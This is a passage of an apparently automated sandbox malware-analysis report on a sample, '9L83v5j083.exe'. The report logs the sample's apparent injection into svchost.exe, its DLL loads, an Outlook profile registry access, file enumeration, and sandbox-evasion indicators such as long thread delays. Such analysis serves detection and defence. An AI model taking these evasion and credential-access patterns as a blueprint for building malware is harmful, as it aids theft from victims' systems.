              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Binary string: _.pdb source: svchost.exe, 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: 9L83v5j083.exe, 00000000.00000003.2060217207.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, 9L83v5j083.exe, 00000000.00000003.2060342834.0000000004060000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: 9L83v5j083.exe, 00000000.00000003.2060217207.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, 9L83v5j083.exe, 00000000.00000003.2060342834.0000000004060000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
              Source: 9L83v5j083.exeStatic PE information: real checksum: 0xa961f should be: 0xed16b
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0789E558 push eax; iretd 2_2_0789E559
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\9L83v5j083.exeAPI/Special instruction interceptor: Address: 2E43214
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5370000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5370000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 7370000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599610Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599475Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599360Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599235Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599110Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598985Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598860Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598735Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598610Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598485Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598360Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598235Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598110Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597985Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597860Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597735Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597610Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597485Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597360Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597235Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597110Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596985Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596763Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596641Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596532Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596407Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596282Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596172Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596032Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595907Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595797Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595657Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595547Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595438Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595327Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595093Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594766Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594641Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594531Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594422Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594313Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594188Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594063Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 593938Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 2053Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 7772Jump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-85639
              Source: C:\Users\user\Desktop\9L83v5j083.exeAPI coverage: 3.6 %
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -23980767295822402s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 4512Thread sleep count: 2053 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -599890s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 4512Thread sleep count: 7772 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -599610s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -599475s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -599360s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -599235s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -599110s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -598985s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -598860s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -598735s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -598610s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -598485s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -598360s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -598235s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -598110s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -597985s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -597860s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -597735s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -597610s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -597485s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -597360s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -597235s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -597110s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -596985s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -596875s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -596763s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -596641s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -596532s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -596407s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -596282s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -596172s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -596032s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -595907s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -595797s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -595657s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -595547s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -595438s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -595327s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -595203s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -595093s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -594985s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -594875s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -594766s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -594641s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -594531s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -594422s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -594313s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -594188s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -594063s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1480Thread sleep time: -593938s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599610Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599475Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599360Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599235Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599110Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598985Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598860Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598735Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598610Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598485Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598360Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598235Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598110Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597985Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597860Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597735Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597610Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597485Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597360Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597235Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597110Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596985Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596763Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596641Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596532Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596407Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596282Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596172Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596032Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595907Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595797Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595657Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595547Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595438Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595327Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595093Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594766Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594641Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594531Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594422Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594313Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594188Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594063Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 593938Jump to behavior
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
